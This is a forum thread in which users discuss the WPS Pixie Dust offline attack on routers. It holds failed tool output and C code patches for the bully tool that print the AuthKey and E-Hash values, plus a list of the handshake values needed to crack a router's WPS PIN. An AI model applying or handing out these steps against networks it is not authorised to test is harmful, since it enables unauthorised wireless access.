WPS Pixie Dust Attack (Offline WPS Attack)

[aanarchyy]

You need to edit the file and put your own data. I dont know where PKR,PKE data is in the packets, thats where im stuck.

Tryed the tool and is giving me

Code:

 Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
TIMEOUT!!

But im trying against Broadcom and not Ralink, as said above Broadcom is not implemented yet.

I hope guys keep developing this subject, its very interesting but over my personal understanding to put in practice, so ill have to wait.
Would it be feasible to add a import from cap feature? i guess that would put some testers running. Thanks everyone

Tried the tool also and it is only giving the same results, but i am trying against an ralink tplink router. Unmodified code does the same.
Looking through the wireshark logs, it is attempting to authenticate, but the script isn't recognizing it is getting a response, I don't really
know enough about python to dig into it, more of a perl guy than python. Starting to learn it though. Trying to extract the part in wpscrack.py
that creates the authkey and feed it what it wants to spit out the authkey, if that's even going to work... From what I am reading about the
KDK it only partialy makes sense to me.

Tried the modified version of bully also, just seems to run normaly, trying pins and moving on to the next. Still confused on how this is
supposed to give the Authkey, which is where I am stuck. I assume it doesn't give it to you automatically, so how do you get it to give
the authkey?

I can get everything else as it's in plain sight. I have a couple ralink routers at my disposal to test this on also.

Code:

maingroup.add_argument('-ak', '--AuthKey', type=str, nargs='?', help='AuthKey obtained from wireshark')

I thought it wasn't obtained from wireshark and you had to run it through the KDK... That just confused me even more...

[soxrok2212]

WPSCrack.py I guess only works with Atheros wireless adapters. Try this to get more info.. comes from Hack Forums:

Code:

int wpa_debug_level = MSG_INFO; // change it to MSG_DEBUG

2: Or, manually add some prints in the (wpa_supplicant) source. Let's take as an example bully (you could try reaver if you wish):
- Download the zip file. Unzip it.
- Go to bully-master/src/wps and open wps_common.c with a text editor.
- Go to line 122 and add something similar (just a print):
Code:
    os_memcpy(wps->emsk, keys + WPS_AUTHKEY_LEN + WPS_KEYWRAPKEY_LEN,
          WPS_EMSK_LEN);

    /****** ADD THIS PART ******/
    printf(" > AuthKey: ");
    int pixiecnt = 0;
    for (; pixiecnt < WPS_AUTHKEY_LEN; pixiecnt++) {
        printf("%02x", *(wps->authkey + pixiecnt));
        if (pixiecnt != WPS_AUTHKEY_LEN - 1) {
            printf(":");
        }
    }
    printf("\n");
    /******/

    wpa_hexdump_key(MSG_DEBUG, "WPS: AuthKey",

- Now open wps_registrar.c.
- Go to line 1719 (inside wps_process_e_hash1 function) and add:
Code:
    wpa_hexdump(MSG_DEBUG, "WPS: E-Hash1", wps->peer_hash1, WPS_HASH_LEN);

    /****** ADD THIS PART ******/
    printf(" > E-Hash1: ");
    int pixiecnt = 0;
    for (; pixiecnt < WPS_HASH_LEN; pixiecnt++) {
        printf("%02x", *(wps->peer_hash1 + pixiecnt));
        if (pixiecnt != WPS_HASH_LEN - 1) {
            printf(":");
        }
    }
    printf("\n");
    /******/

    return 0;

- Then in the function below (inside wps_process_e_hash2) add:
Code:
    wpa_hexdump(MSG_DEBUG, "WPS: E-Hash2", wps->peer_hash2, WPS_HASH_LEN);

    /****** ADD THIS PART ******/
    printf(" > E-Hash2: ");
    int pixiecnt = 0;
    for (; pixiecnt < WPS_HASH_LEN; pixiecnt++) {
        printf("%02x", *(wps->peer_hash2 + pixiecnt));
        if (pixiecnt != WPS_HASH_LEN - 1) {
            printf(":");
        }
    }
    printf("\n");
    /******/

    return 0;

Then please post this here:

Code:

AP Manufacturer:
Model name/number:
Chipset: 

N1 Nonce: 
Authkey: 
PKE: 
PKR: 
E-Hash1: 
E:Hash2:

First 3 are optional, last 6 are mandatory to crack.